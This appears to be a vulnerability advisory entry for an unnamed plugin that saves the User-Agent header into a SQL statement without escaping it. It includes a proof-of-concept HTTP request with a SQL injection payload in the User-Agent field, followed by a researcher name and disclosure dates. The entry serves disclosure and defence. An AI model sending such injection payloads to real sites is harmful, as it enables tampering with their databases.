The plugin does not sanitise and escape the User Agent before using it in a SQL statement to save it, leading to a SQL injection
GET / HTTP/1.1 User-Agent: Zongbot' where id = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'-- - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
JrXnm
JrXnm
Yes
2021-11-15 (about 6 months ago)
2021-11-15 (about 6 months ago)
2022-04-09 (about 1 months ago)